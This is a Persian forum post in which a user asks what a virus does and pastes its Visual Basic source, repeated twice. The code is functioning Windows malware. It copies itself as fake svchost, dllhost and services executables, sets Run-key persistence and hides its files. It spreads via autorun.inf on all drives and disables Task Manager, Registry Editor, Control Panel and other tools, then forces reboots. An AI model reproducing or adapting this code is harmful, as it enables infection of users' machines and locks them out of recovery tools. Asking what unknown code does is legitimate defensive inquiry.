سلام
ارسال شده: سهشنبه ۱۲ آذر ۱۳۸۷, ۷:۱۴ ب.ظ
سلام
من سورس یک ویروس با آنتی ویروسش دارم اما نمیدونم چی کار میکنه و میترسم روی سیستم خودم امتحان کنم میدونین این ویروس چی کار میکنه.
modul1:
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal HKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Const REG_NONE = 0
Public Const REG_MULTI_SZ = 7
Public Const REG_EXPAND_SZ = 2
Public Const REG_BINARY = 3
Public Declare Function SetWindowLong Lib "User32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function SetLayeredWindowAttributes Lib "user32.dll" (ByVal hWnd As Long, ByVal crKey As Long, ByVal bAlpha As Byte, ByVal dwFlags As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetWindowText Lib "User32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Public Declare Function EnumWindows Lib "User32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function IsWindowVisible Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetParent Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetWindowLong Lib "User32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Public Declare Function GetWindowText Lib "User32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const GWL_HWNDPARENT = (-8)
Public Const LB_ADDSTRING = &H180
Public Const LB_SETITEMDATA = &H19A
Public Declare Function GetActiveWindow Lib "User32" () As Long
Public Declare Function GetWindowDC Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal X As Long, ByVal Y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Public Declare Function BlockInput Lib "User32" (ByVal fBlock As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const BM_SETSTATE = &HF3
Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOMOVE = &H2
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40
Public Const TOPMOST_FLAGS = SWP_NOMOVE Or SWP_NOSIZE
Public Declare Function SwapMouseButton Lib "User32" (ByVal bSwap As Long) As Long
Public Declare Function SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, Y, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Const MAX_PATH As Integer = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Public Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Public Declare Function FindWindow Lib "User32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public hSnapShot As Long, uProcess As PROCESSENTRY32
Public blnMsgBoxResult As Boolean
Public strSource As String, strDest As String
Public strOutput(20) As String, strTemp As String
Public blnBlockinput As Boolean
Public strSysDir As String, strFileExist As String
Public strAppPath As String
modul2:
Public Sub AddToRun_Copy_Hide()
blnVirusRuning = True
On Error Resume Next
strSource = App.Path & IIf(Len(App.Path) > 0, "\", Empty)
strSource = strSource & App.EXEName & ".exe"
If (App.EXEName <> "svchost" And App.EXEName <> "spoolsv" And App.EXEName <> "smss") Then
strDest = WinDrive & "WINDOWS\system32\drivers\"
FileCopy strSource, strDest & "svchost.exe"
AddToRun "svchost", strDest & "svchost.exe"
SetAttr strDest & "svchost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "svchost.exe", vbNormalNoFocus
FileCopy strSource, strDest & "dllhost.exe"
AddToRun "krnl32 dllhost", strDest & "dllhost.exe"
SetAttr strDest & "dllhost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "dllhost.exe", vbNormalNoFocus
strDest = WinDrive & "Documents and Settings\All Users\Application Data\"
FileCopy strSource, strDest & "services.exe"
AddToRun "ctfmon", strDest & "services.exe"
SetAttr strDest & "services.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "services.exe", vbNormalNoFocus
End If
End Sub
Private Sub SaveString(ByVal HKey As Long, strPath As String, strValue As String, ByVal lngdata As Long, ByVal lngType As Long, ByVal lngLen As Long)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, lngType, lngdata, CLng(lngLen))
r = RegCloseKey(keyhand)
End Sub
Public Sub MakeTopMost(lngHwnd As Long)
SetWindowPos lngHwnd, HWND_TOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS
End Sub
Public Function WinDrive() As String
Dim strDrive As String
strDrive = Space(500)
A = GetWindowsDirectory(strDrive, Len(strDrive))
strDrive = Left(strDrive, 3)
WinDrive = strDrive
End Function
Public Sub CloseProgram(ByVal WindowName As String)
On Error Resume Next
Handle = FindWindow(vbNullString, WindowName)
If Handle = 0 Then Exit Sub
Call SendMessage(Handle, &H10, 0&, 0&)
Shell "Shutdown -r -t 0"
End Sub
Public Sub MakeAutoRun()
Dim strDrive As String, strDrives As String
On Error Resume Next
strAutorun = "[autorun]" & vbCrLf & _
"OPEN=Autorun.exe" & vbCrLf & _
"shell\open=Open" & vbCrLf & _
"shell\open\Command=Autorun.exe" & vbCrLf & _
"shell\explore=Explore" & vbCrLf & _
"shell\explore\Command=""Autorun.exe -e"""
strDrives = String(255, Chr$(0))
Ret& = GetLogicalDriveStrings(255, strDrives)
strDrives = Right$(strDrives, Len(strDrives) - InStr(1, strDrives, Chr$(0)))
For i = 1 To 100
If Left$(strDrives, InStr(1, strDrives, Chr$(0))) = Chr$(0) Then Exit For
strDrive = Left$(strDrives, InStr(1, strDrives, Chr$(0)) - 1)
If strDrive <> "A:\" Then
Open strDrive & "Autorun.inf" For Output As #1
Print #1, strAutorun
Close #1
End If
SetAttr strDrive & "Autorun.inf", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
FileCopy WinDrive & "Documents and Settings\All Users\Application Data\services.exe", strDrive & "Autorun.exe"
SetAttr strDrive & "Autorun.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
strDrives = Right$(strDrives, Len(strDrives) - InStr(1, strDrives, Chr$(0)))
Next
End Sub
Public Sub Sabotage() ' Sabotage = Kharab kari
Call AddToRun_Copy_Hide
Call DisableRegEdit
Call DisableTaskManager
Call DisableDisplayProperties
Call DisableShutdown
Call DisableSearch
Call DisableMyComputerProperties
Call DisableRun
Call DisableAllPrograms
Call HideDrive_C
Call DisableControlPanel
Call DisableFolderOption
Call DontShowHiddenFiles
Call DontShowSuperHiddenFiles
Call DisableAddRemove
Call ChangeNameAndCompanyName
End Sub
Private Sub DisableRegEdit()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", 1, REG_DWORD, 4)
End Sub
Private Sub DisableTaskManager()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", 1, REG_DWORD, 4)
End Sub
Private Sub DisableDisplayProperties()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "NoDispCPL", 1, REG_DWORD, 4)
End Sub
Private Sub DisableShutdown()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\policies\Explorer", "NoClose", 1, REG_DWORD, 4)
End Sub
Private Sub DisableSearch()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFind", 1, REG_DWORD, 4)
End Sub
Private Sub DisableMyComputerProperties()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoPropertiesMyComputer", 1, REG_DWORD, 4)
End Sub
Private Sub DisableRun()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun", 1, REG_DWORD, 4)
End Sub
Private Sub DisableAllPrograms()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoStartMenuMorePrograms", 1, REG_DWORD, 4)
End Sub
Private Sub HideDrive_C()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDrives", 4, REG_DWORD, 4)
End Sub
Private Sub DisableControlPanel()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoControlPanel", 1, REG_DWORD, 4)
End Sub
Private Sub DisableFolderOption()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", 1, REG_DWORD, 4)
End Sub
Private Sub DontShowHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN", "CheckedValue", 2, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", 0, REG_DWORD, 4)
End Sub
Private Sub DontShowSuperHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", "UncheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "SuperHidden", 0, REG_DWORD, 4)
End Sub
Private Sub DisableAddRemove()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddRemovePrograms", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromCDorFloppy", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromInternet", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromNetwork", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddPage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoRemovePage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoServices", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoSetFolders", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoSupportInfo", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoWindowsSetupPage", 1, REG_DWORD, 4)
End Sub
Private Sub ChangeNameAndCompanyName()
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", keyhand)
r = RegSetValueEx(keyhand, "RegisteredOwner", 0, REG_SZ, ByVal "Amir Amiri", Len("Amir Amiri"))
r = RegSetValueEx(keyhand, "RegisteredOrganization", 0, REG_SZ, ByVal "Http://V-Basic.Mihanblog.Com", Len("Http://V-Basic.Mihanblog.Com"))
r = RegCloseKey(keyhand)
End Sub
Public Sub AddToRun(ProgramName As String, FileToRun As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", keyhand)
r = RegSetValueEx(keyhand, ProgramName, 0, REG_SZ, ByVal FileToRun, Len(FileToRun))
r = RegCloseKey(keyhand)
End Sub
من سورس یک ویروس با آنتی ویروسش دارم اما نمیدونم چی کار میکنه و میترسم روی سیستم خودم امتحان کنم میدونین این ویروس چی کار میکنه.
modul1:
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal HKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Const REG_NONE = 0
Public Const REG_MULTI_SZ = 7
Public Const REG_EXPAND_SZ = 2
Public Const REG_BINARY = 3
Public Declare Function SetWindowLong Lib "User32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function SetLayeredWindowAttributes Lib "user32.dll" (ByVal hWnd As Long, ByVal crKey As Long, ByVal bAlpha As Byte, ByVal dwFlags As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetWindowText Lib "User32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Public Declare Function EnumWindows Lib "User32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function IsWindowVisible Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetParent Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function GetWindowLong Lib "User32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Public Declare Function GetWindowText Lib "User32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function SendMessage Lib "User32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const GWL_HWNDPARENT = (-8)
Public Const LB_ADDSTRING = &H180
Public Const LB_SETITEMDATA = &H19A
Public Declare Function GetActiveWindow Lib "User32" () As Long
Public Declare Function GetWindowDC Lib "User32" (ByVal hWnd As Long) As Long
Public Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal X As Long, ByVal Y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Public Declare Function BlockInput Lib "User32" (ByVal fBlock As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const BM_SETSTATE = &HF3
Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOMOVE = &H2
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40
Public Const TOPMOST_FLAGS = SWP_NOMOVE Or SWP_NOSIZE
Public Declare Function SwapMouseButton Lib "User32" (ByVal bSwap As Long) As Long
Public Declare Function SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, Y, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Const MAX_PATH As Integer = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Public Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Public Declare Function FindWindow Lib "User32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public hSnapShot As Long, uProcess As PROCESSENTRY32
Public blnMsgBoxResult As Boolean
Public strSource As String, strDest As String
Public strOutput(20) As String, strTemp As String
Public blnBlockinput As Boolean
Public strSysDir As String, strFileExist As String
Public strAppPath As String
modul2:
Public Sub AddToRun_Copy_Hide()
blnVirusRuning = True
On Error Resume Next
strSource = App.Path & IIf(Len(App.Path) > 0, "\", Empty)
strSource = strSource & App.EXEName & ".exe"
If (App.EXEName <> "svchost" And App.EXEName <> "spoolsv" And App.EXEName <> "smss") Then
strDest = WinDrive & "WINDOWS\system32\drivers\"
FileCopy strSource, strDest & "svchost.exe"
AddToRun "svchost", strDest & "svchost.exe"
SetAttr strDest & "svchost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "svchost.exe", vbNormalNoFocus
FileCopy strSource, strDest & "dllhost.exe"
AddToRun "krnl32 dllhost", strDest & "dllhost.exe"
SetAttr strDest & "dllhost.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "dllhost.exe", vbNormalNoFocus
strDest = WinDrive & "Documents and Settings\All Users\Application Data\"
FileCopy strSource, strDest & "services.exe"
AddToRun "ctfmon", strDest & "services.exe"
SetAttr strDest & "services.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
Shell strDest & "services.exe", vbNormalNoFocus
End If
End Sub
Private Sub SaveString(ByVal HKey As Long, strPath As String, strValue As String, ByVal lngdata As Long, ByVal lngType As Long, ByVal lngLen As Long)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, lngType, lngdata, CLng(lngLen))
r = RegCloseKey(keyhand)
End Sub
Public Sub MakeTopMost(lngHwnd As Long)
SetWindowPos lngHwnd, HWND_TOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS
End Sub
Public Function WinDrive() As String
Dim strDrive As String
strDrive = Space(500)
A = GetWindowsDirectory(strDrive, Len(strDrive))
strDrive = Left(strDrive, 3)
WinDrive = strDrive
End Function
Public Sub CloseProgram(ByVal WindowName As String)
On Error Resume Next
Handle = FindWindow(vbNullString, WindowName)
If Handle = 0 Then Exit Sub
Call SendMessage(Handle, &H10, 0&, 0&)
Shell "Shutdown -r -t 0"
End Sub
Public Sub MakeAutoRun()
Dim strDrive As String, strDrives As String
On Error Resume Next
strAutorun = "[autorun]" & vbCrLf & _
"OPEN=Autorun.exe" & vbCrLf & _
"shell\open=Open" & vbCrLf & _
"shell\open\Command=Autorun.exe" & vbCrLf & _
"shell\explore=Explore" & vbCrLf & _
"shell\explore\Command=""Autorun.exe -e"""
strDrives = String(255, Chr$(0))
Ret& = GetLogicalDriveStrings(255, strDrives)
strDrives = Right$(strDrives, Len(strDrives) - InStr(1, strDrives, Chr$(0)))
For i = 1 To 100
If Left$(strDrives, InStr(1, strDrives, Chr$(0))) = Chr$(0) Then Exit For
strDrive = Left$(strDrives, InStr(1, strDrives, Chr$(0)) - 1)
If strDrive <> "A:\" Then
Open strDrive & "Autorun.inf" For Output As #1
Print #1, strAutorun
Close #1
End If
SetAttr strDrive & "Autorun.inf", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
FileCopy WinDrive & "Documents and Settings\All Users\Application Data\services.exe", strDrive & "Autorun.exe"
SetAttr strDrive & "Autorun.exe", vbNormal + vbSystem + vbHidden + vbArchive + vbReadOnly
strDrives = Right$(strDrives, Len(strDrives) - InStr(1, strDrives, Chr$(0)))
Next
End Sub
Public Sub Sabotage() ' Sabotage = Kharab kari
Call AddToRun_Copy_Hide
Call DisableRegEdit
Call DisableTaskManager
Call DisableDisplayProperties
Call DisableShutdown
Call DisableSearch
Call DisableMyComputerProperties
Call DisableRun
Call DisableAllPrograms
Call HideDrive_C
Call DisableControlPanel
Call DisableFolderOption
Call DontShowHiddenFiles
Call DontShowSuperHiddenFiles
Call DisableAddRemove
Call ChangeNameAndCompanyName
End Sub
Private Sub DisableRegEdit()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", 1, REG_DWORD, 4)
End Sub
Private Sub DisableTaskManager()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", 1, REG_DWORD, 4)
End Sub
Private Sub DisableDisplayProperties()
Call SaveString(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "NoDispCPL", 1, REG_DWORD, 4)
End Sub
Private Sub DisableShutdown()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\policies\Explorer", "NoClose", 1, REG_DWORD, 4)
End Sub
Private Sub DisableSearch()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFind", 1, REG_DWORD, 4)
End Sub
Private Sub DisableMyComputerProperties()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoPropertiesMyComputer", 1, REG_DWORD, 4)
End Sub
Private Sub DisableRun()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun", 1, REG_DWORD, 4)
End Sub
Private Sub DisableAllPrograms()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoStartMenuMorePrograms", 1, REG_DWORD, 4)
End Sub
Private Sub HideDrive_C()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDrives", 4, REG_DWORD, 4)
End Sub
Private Sub DisableControlPanel()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoControlPanel", 1, REG_DWORD, 4)
End Sub
Private Sub DisableFolderOption()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", 1, REG_DWORD, 4)
End Sub
Private Sub DontShowHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN", "CheckedValue", 2, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", 0, REG_DWORD, 4)
End Sub
Private Sub DontShowSuperHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", "CheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", "UncheckedValue", 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "SuperHidden", 0, REG_DWORD, 4)
End Sub
Private Sub DisableAddRemove()
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddRemovePrograms", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromCDorFloppy", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromInternet", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddFromNetwork", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoAddPage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoRemovePage", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoServices", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoSetFolders", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoSupportInfo", 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall", "NoWindowsSetupPage", 1, REG_DWORD, 4)
End Sub
Private Sub ChangeNameAndCompanyName()
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", keyhand)
r = RegSetValueEx(keyhand, "RegisteredOwner", 0, REG_SZ, ByVal "Amir Amiri", Len("Amir Amiri"))
r = RegSetValueEx(keyhand, "RegisteredOrganization", 0, REG_SZ, ByVal "Http://V-Basic.Mihanblog.Com", Len("Http://V-Basic.Mihanblog.Com"))
r = RegCloseKey(keyhand)
End Sub
Public Sub AddToRun(ProgramName As String, FileToRun As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", keyhand)
r = RegSetValueEx(keyhand, ProgramName, 0, REG_SZ, ByVal FileToRun, Len(FileToRun))
r = RegCloseKey(keyhand)
End Sub